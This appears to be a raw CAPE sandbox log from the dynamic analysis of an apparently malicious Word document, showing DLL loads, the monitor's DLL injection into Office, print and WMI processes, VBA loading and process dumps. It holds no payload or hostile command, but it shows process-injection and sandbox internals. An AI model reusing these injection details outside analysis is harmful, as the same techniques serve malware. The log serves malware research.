2019-05-14 15:42:20,309 [root] DEBUG: DLL loaded at 0x740F0000: C:\Program Files (x86)\Windows Defender\MpOav (0x10000 bytes).
2019-05-14 15:42:20,309 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:20,325 [root] DEBUG: DLL loaded at 0x74080000: C:\Program Files (x86)\Windows Defender\MPCLIENT (0x63000 bytes).
2019-05-14 15:42:20,341 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2019-05-14 15:42:21,058 [root] DEBUG: DLL unloaded from 0x76940000.
2019-05-14 15:42:21,073 [root] DEBUG: DLL unloaded from 0x74080000.
2019-05-14 15:42:21,121 [root] DEBUG: DLL loaded at 0x74010000: C:\Program Files (x86)\Windows Defender\MPCLIENT (0x63000 bytes).
2019-05-14 15:42:21,121 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2019-05-14 15:42:21,151 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:21,167 [root] DEBUG: DLL unloaded from 0x76940000.
2019-05-14 15:42:21,167 [root] DEBUG: DLL unloaded from 0x74010000.
2019-05-14 15:42:21,651 [root] DEBUG: DLL loaded at 0x74090000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-05-14 15:42:21,681 [root] DEBUG: DLL loaded at 0x740E0000: C:\Windows\system32\msiltcfg (0x7000 bytes).
2019-05-14 15:42:21,713 [root] DEBUG: DLL loaded at 0x72BF0000: C:\Windows\system32\msi (0x240000 bytes).
2019-05-14 15:42:21,729 [root] DEBUG: DLL unloaded from 0x72BF0000.
2019-05-14 15:42:21,854 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-05-14 15:42:21,869 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:21,884 [root] DEBUG: DLL loaded at 0x740D0000: C:\Windows\SysWOW64\SFC (0x3000 bytes).
2019-05-14 15:42:21,901 [root] DEBUG: DLL loaded at 0x740C0000: C:\Windows\system32\sfc_os (0xd000 bytes).
2019-05-14 15:42:22,118 [root] INFO: Announced 32-bit process name: WINWORD.EXE pid: 1668
2019-05-14 15:42:22,118 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:42:22,118 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:22,118 [lib.api.process] INFO: 32-bit DLL to inject is C:\tcjnwjnzzp\dll\WxChra.dll, loader C:\tcjnwjnzzp\bin\nQdUxdR.exe
2019-05-14 15:42:22,118 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:22,118 [root] DEBUG: Loader: Injecting process 1668 (thread 2128) with C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:22,118 [root] DEBUG: Process image base: 0x2FD60000
2019-05-14 15:42:22,118 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:22,118 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2FEBD000 - 0x77380000
2019-05-14 15:42:22,118 [root] DEBUG: InjectDllViaIAT: Allocated 0x178 bytes for new import table at 0x2FEC0000.
2019-05-14 15:42:22,118 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:42:22,118 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:22,118 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1668
2019-05-14 15:42:22,181 [root] DEBUG: DLL loaded at 0x74080000: C:\Windows\system32\DEVRTL (0xe000 bytes).
2019-05-14 15:42:22,181 [root] DEBUG: DLL unloaded from 0x740D0000.
2019-05-14 15:42:22,227 [root] DEBUG: DLL loaded at 0x74060000: C:\Windows\system32\MPR (0x12000 bytes).
2019-05-14 15:42:22,275 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-05-14 15:42:22,275 [root] DEBUG: DLL unloaded from 0x74140000.
2019-05-14 15:42:22,275 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:22,275 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:22,275 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:22,275 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:42:22,275 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1668 at 0x747a0000, image base 0x2fd60000, stack from 0x3c6000-0x3d0000
2019-05-14 15:42:22,275 [root] DEBUG: Commandline: C:\Users\user\Desktop\"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" \n "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc".
2019-05-14 15:42:22,275 [root] INFO: Added new process to list with pid: 1668
2019-05-14 15:42:22,275 [root] INFO: Monitor successfully loaded in process with pid 1668.
2019-05-14 15:42:22,290 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\Comctl32 (0x84000 bytes).
2019-05-14 15:42:22,447 [root] DEBUG: DLL loaded at 0x71970000: C:\Program Files (x86)\Microsoft Office\Office14\wwlib (0x127b000 bytes).
2019-05-14 15:42:22,447 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-05-14 15:42:22,477 [root] DEBUG: DLL loaded at 0x717C0000: C:\Program Files (x86)\Microsoft Office\Office14\gfx (0x1ab000 bytes).
2019-05-14 15:42:22,477 [root] DEBUG: DLL loaded at 0x74140000: C:\Windows\system32\WTSAPI32 (0xd000 bytes).
2019-05-14 15:42:22,477 [root] DEBUG: DLL loaded at 0x74220000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-05-14 15:42:22,525 [root] DEBUG: DLL loaded at 0x70420000: C:\Program Files (x86)\Microsoft Office\Office14\oart (0x1392000 bytes).
2019-05-14 15:42:22,711 [root] DEBUG: DLL loaded at 0x6F230000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-05-14 15:42:22,727 [root] DEBUG: DLL loaded at 0x72BF0000: C:\Windows\system32\msi (0x240000 bytes).
2019-05-14 15:42:22,743 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-05-14 15:42:23,039 [root] DEBUG: DLL loaded at 0x74600000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-05-14 15:42:23,132 [root] DEBUG: DLL loaded at 0x6EE20000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-05-14 15:42:23,319 [root] DEBUG: DLL loaded at 0x73F90000: C:\Program Files (x86)\Microsoft Office\Office14\1033\wwintl (0xc9000 bytes).
2019-05-14 15:42:23,460 [root] DEBUG: DLL loaded at 0x6EBB0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-05-14 15:42:23,476 [root] DEBUG: DLL loaded at 0x6A680000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-05-14 15:42:23,523 [root] DEBUG: DLL unloaded from 0x75700000.
2019-05-14 15:42:23,553 [root] DEBUG: DLL loaded at 0x72F30000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-05-14 15:42:23,617 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:23,648 [root] DEBUG: DLL loaded at 0x73ED0000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS (0xbc000 bytes).
2019-05-14 15:42:23,710 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-05-14 15:42:23,742 [root] INFO: Announced 32-bit process name:  pid: 1
2019-05-14 15:42:23,742 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-05-14 15:42:23,742 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-05-14 15:42:23,788 [root] DEBUG: DLL loaded at 0x72F60000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-05-14 15:42:23,819 [root] DEBUG: DLL unloaded from 0x000007FEFBC70000.
2019-05-14 15:42:23,819 [root] INFO: Announced 32-bit process name:  pid: 109350132
2019-05-14 15:42:23,819 [lib.api.process] WARNING: The process with pid 109350132 is not alive, injection aborted
2019-05-14 15:42:23,819 [root] DEBUG: DLL loaded at 0x73190000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-05-14 15:42:23,819 [root] DEBUG: set_caller_info: Adding region at 0x002D0000 to caller regions list (advapi32::RegQueryInfoKeyW).
2019-05-14 15:42:23,819 [root] DEBUG: set_caller_info: Adding region at 0x01ED0000 to caller regions list (advapi32::RegOpenKeyExW).
2019-05-14 15:42:23,819 [root] DEBUG: set_caller_info: Adding region at 0x00570000 to caller regions list (kernel32::FindFirstFileExW).
2019-05-14 15:42:23,819 [root] DEBUG: DLL loaded at 0x73110000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-05-14 15:42:23,944 [root] DEBUG: DLL loaded at 0x74120000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-05-14 15:42:24,085 [root] DEBUG: DLL loaded at 0x6A620000: C:\Windows\system32\Winspool.DRV (0x51000 bytes).
2019-05-14 15:42:24,163 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-05-14 15:42:24,163 [root] DEBUG: DLL unloaded from 0x75700000.
2019-05-14 15:42:24,163 [root] DEBUG: DLL loaded at 0x6A5F0000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-05-14 15:42:24,163 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-05-14 15:42:24,163 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-05-14 15:42:24,163 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-05-14 15:42:24,163 [root] DEBUG: DLL unloaded from 0x6A5F0000.
2019-05-14 15:42:24,272 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-05-14 15:42:24,272 [root] DEBUG: DLL unloaded from 0x2FD60000.
2019-05-14 15:42:24,272 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-05-14 15:42:24,272 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-05-14 15:42:24,272 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-05-14 15:42:24,272 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-05-14 15:42:24,288 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-05-14 15:42:24,288 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-05-14 15:42:24,288 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-05-14 15:42:24,288 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-05-14 15:42:24,381 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-05-14 15:42:24,397 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-05-14 15:42:24,397 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-05-14 15:42:24,552 [root] DEBUG: DLL loaded at 0x6A4C0000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-05-14 15:42:24,709 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\profapi (0xb000 bytes).
2019-05-14 15:42:24,973 [root] DEBUG: DLL loaded at 0x731E0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-05-14 15:42:24,973 [root] DEBUG: DLL loaded at 0x74B60000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-05-14 15:42:24,973 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-05-14 15:42:25,068 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-05-14 15:42:25,068 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-05-14 15:42:25,068 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-05-14 15:42:25,068 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-05-14 15:42:25,302 [root] DEBUG: DLL loaded at 0x6A280000: C:\Program Files (x86)\Microsoft Office\Office14\GKWord (0x238000 bytes).
2019-05-14 15:42:25,411 [root] DEBUG: DLL unloaded from 0x6A280000.
2019-05-14 15:42:25,473 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 1644
2019-05-14 15:42:25,473 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:42:25,473 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:25,473 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:42:25,473 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:25,473 [root] DEBUG: Loader: Injecting process 1644 (thread 2640) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:25,473 [root] DEBUG: Process image base: 0x00000000FFF10000
2019-05-14 15:42:25,473 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:25,473 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFF24000 - 0x000007FEFF6A0000
2019-05-14 15:42:25,473 [root] DEBUG: InjectDllViaIAT: Allocated 0x204 bytes for new import table at 0x00000000FFF30000.
2019-05-14 15:42:25,473 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:42:25,473 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:25,473 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1644
2019-05-14 15:42:25,489 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:25,489 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:25,489 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:25,489 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:42:25,489 [root] WARNING: Unable to hook LockResource
2019-05-14 15:42:25,503 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:42:25,503 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1644 at 0x0000000074260000, image base 0x00000000FFF10000, stack from 0x00000000001E6000-0x00000000001F0000
2019-05-14 15:42:25,503 [root] DEBUG: Commandline: C:\Windows\splwow64.exe 12288.
2019-05-14 15:42:25,503 [root] INFO: Added new process to list with pid: 1644
2019-05-14 15:42:25,503 [root] INFO: Monitor successfully loaded in process with pid 1644.
2019-05-14 15:42:25,519 [root] DEBUG: DLL loaded at 0x000007FEFD270000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-05-14 15:42:25,536 [root] DEBUG: DLL loaded at 0x000007FEFCF60000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-05-14 15:42:25,566 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\cryptsp (0x17000 bytes).
2019-05-14 15:42:25,566 [root] DEBUG: DLL loaded at 0x000007FEFC760000: C:\Windows\system32\credssp (0xa000 bytes).
2019-05-14 15:42:25,582 [root] DEBUG: DLL unloaded from 0x000007FEFCB60000.
2019-05-14 15:42:25,582 [root] DEBUG: DLL unloaded from 0x6A620000.
2019-05-14 15:42:25,644 [root] DEBUG: DLL loaded at 0x000007FEF3D10000: C:\Windows\system32\spool\DRIVERS\x64\3\unidrvui (0xdc000 bytes).
2019-05-14 15:42:25,660 [root] DEBUG: DLL loaded at 0x000007FEFC430000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-05-14 15:42:25,660 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-05-14 15:42:25,769 [root] DEBUG: DLL loaded at 0x000007FEF9A40000: C:\Windows\system32\spool\DRIVERS\x64\3\SendToOneNoteUI (0x12000 bytes).
2019-05-14 15:42:25,801 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:25,801 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:42:25,815 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:25,815 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:42:25,862 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:25,862 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:25,878 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:25,878 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:25,910 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:25,940 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:25,957 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:25,971 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:25,987 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:25,987 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:26,019 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:26,035 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:26,035 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:26,049 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:42:26,082 [root] DEBUG: DLL loaded at 0x000007FEF3C50000: C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv (0xb2000 bytes).
2019-05-14 15:42:26,112 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:26,269 [root] DEBUG: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\FontSub (0x1c000 bytes).
2019-05-14 15:42:26,315 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:26,331 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:26,331 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:42:26,331 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:26,346 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-05-14 15:42:26,361 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:26,361 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:26,378 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:42:26,378 [root] DEBUG: DLL unloaded from 0x000007FEF3D10000.
2019-05-14 15:42:26,752 [root] DEBUG: DLL loaded at 0x6A420000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10 (0x9e000 bytes).
2019-05-14 15:42:27,017 [root] DEBUG: DLL loaded at 0x6A2F0000: C:\Windows\SysWOW64\FM20 (0x12c000 bytes).
2019-05-14 15:42:27,049 [root] DEBUG: DLL loaded at 0x768C0000: C:\Windows\syswow64\COMDLG32 (0x7b000 bytes).
2019-05-14 15:42:27,329 [root] DEBUG: DLL loaded at 0x730B0000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-05-14 15:42:27,375 [root] DEBUG: DLL loaded at 0x6A060000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-05-14 15:42:27,391 [root] DEBUG: set_caller_info: Adding region at 0x00120000 to caller regions list (ntdll::memcpy).
2019-05-14 15:42:27,407 [root] DEBUG: DLL loaded at 0x74090000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-05-14 15:42:27,423 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-05-14 15:42:27,438 [root] DEBUG: set_caller_info: Adding region at 0x05680000 to caller regions list (ntdll::memcpy).
2019-05-14 15:42:27,470 [root] DEBUG: set_caller_info: Adding region at 0x08150000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-05-14 15:42:27,470 [root] DEBUG: set_caller_info: Adding region at 0x060D0000 to caller regions list (ntdll::memcpy).
2019-05-14 15:42:27,470 [root] DEBUG: set_caller_info: Adding region at 0x00020000 to caller regions list (ntdll::memcpy).
2019-05-14 15:42:27,500 [root] DEBUG: set_caller_info: Adding region at 0x006F0000 to caller regions list (ntdll::memcpy).
2019-05-14 15:42:27,500 [root] DEBUG: set_caller_info: Adding region at 0x00460000 to caller regions list (advapi32::RegCloseKey).
2019-05-14 15:42:27,532 [root] DEBUG: set_caller_info: Adding region at 0x00470000 to caller regions list (advapi32::RegOpenKeyExA).
2019-05-14 15:42:27,532 [root] DEBUG: set_caller_info: Adding region at 0x00430000 to caller regions list (msvcrt::memcpy).
2019-05-14 15:42:27,563 [root] DEBUG: set_caller_info: Adding region at 0x07F70000 to caller regions list (kernel32::GetLocalTime).
2019-05-14 15:42:28,233 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6EE0000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-05-14 15:42:28,266 [root] DEBUG: set_caller_info: Adding region at 0x00A10000 to caller regions list (ntdll::memcpy).
2019-05-14 15:42:28,328 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\SysWOW64\fm20ENU (0x8000 bytes).
2019-05-14 15:42:28,592 [root] DEBUG: set_caller_info: Adding region at 0x04040000 to caller regions list (msvcrt::memcpy).
2019-05-14 15:42:28,874 [root] DEBUG: DLL loaded at 0x6A020000: C:\Windows\system32\wbem\wbemdisp (0x31000 bytes).
2019-05-14 15:42:28,904 [root] DEBUG: DLL loaded at 0x69FC0000: C:\Windows\system32\wbemcomn (0x5c000 bytes).
2019-05-14 15:42:28,904 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2019-05-14 15:42:28,904 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-05-14 15:42:28,999 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:29,061 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4160000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-05-14 15:42:29,076 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF42B0000 to caller regions list (advapi32::OpenSCManagerW).
2019-05-14 15:42:29,372 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1552
2019-05-14 15:42:29,372 [root] DEBUG: GetHookCallerBase: thread 164 (handle 0x0), return address 0x0133129E, allocation base 0x01330000.
2019-05-14 15:42:29,372 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x01330000.
2019-05-14 15:42:29,372 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x01330000.
2019-05-14 15:42:29,372 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001C9A.
2019-05-14 15:42:29,404 [root] INFO: Added new CAPE file to list with path: C:\gpkjls\CAPE\1552_19854809862921814252019
2019-05-14 15:42:29,404 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa2a00.
2019-05-14 15:42:29,404 [root] DEBUG: DLL unloaded from 0x72BF0000.
2019-05-14 15:42:29,404 [root] DEBUG: DLL unloaded from 0x74340000.
2019-05-14 15:42:29,404 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:29,420 [root] DEBUG: DLL unloaded from 0x75700000.
2019-05-14 15:42:29,420 [root] DEBUG: DLL unloaded from 0x74BB0000.
2019-05-14 15:42:29,420 [root] INFO: Notified of termination of process with pid 1552.
2019-05-14 15:42:29,482 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 548
2019-05-14 15:42:29,482 [root] DEBUG: GetHookCallerBase: thread 1900 (handle 0x0), return address 0x0133129E, allocation base 0x01330000.
2019-05-14 15:42:29,482 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x01330000.
2019-05-14 15:42:29,497 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x01330000.
2019-05-14 15:42:29,513 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001C9A.
2019-05-14 15:42:29,513 [root] INFO: Added new CAPE file to list with path: C:\gpkjls\CAPE\548_14130778562921814252019
2019-05-14 15:42:29,513 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa2a00.
2019-05-14 15:42:29,575 [root] DEBUG: DLL unloaded from 0x74340000.
2019-05-14 15:42:29,592 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:29,607 [root] DEBUG: DLL unloaded from 0x75700000.
2019-05-14 15:42:29,607 [root] DEBUG: DLL unloaded from 0x74BB0000.
2019-05-14 15:42:29,607 [root] INFO: Notified of termination of process with pid 548.
2019-05-14 15:42:29,622 [root] INFO: Process with pid 548 has terminated
2019-05-14 15:42:30,637 [root] INFO: Process with pid 1552 has terminated
2019-05-14 15:42:30,651 [root] DEBUG: DLL unloaded from 0x000007FEFE710000.
2019-05-14 15:42:36,657 [root] INFO: Stopped WMI Service
2019-05-14 15:42:36,657 [root] INFO: Attaching to DcomLaunch service (pid 568)
2019-05-14 15:42:36,657 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-05-14 15:42:36,657 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:36,657 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:42:36,736 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:36,752 [root] DEBUG: Loader: Injecting process 568 (thread 0) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:36,752 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 572, handle 0x84
2019-05-14 15:42:36,752 [root] DEBUG: Process image base: 0x00000000FF8E0000
2019-05-14 15:42:36,813 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-05-14 15:42:36,813 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-05-14 15:42:36,813 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:36,877 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:36,877 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:36,877 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:42:36,877 [root] WARNING: Unable to hook LockResource
2019-05-14 15:42:36,891 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 568 at 0x0000000074260000, image base 0x00000000FF8E0000, stack from 0x0000000000626000-0x0000000000630000
2019-05-14 15:42:36,938 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k DcomLaunch.
2019-05-14 15:42:36,938 [root] INFO: Added new process to list with pid: 568
2019-05-14 15:42:36,938 [root] INFO: Monitor successfully loaded in process with pid 568.
2019-05-14 15:42:36,938 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-05-14 15:42:36,970 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-05-14 15:42:36,970 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:41,727 [root] INFO: Started WMI Service
2019-05-14 15:42:41,727 [root] INFO: Attaching to WMI service (pid 1732)
2019-05-14 15:42:41,727 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-05-14 15:42:41,930 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:41,930 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:42:42,134 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
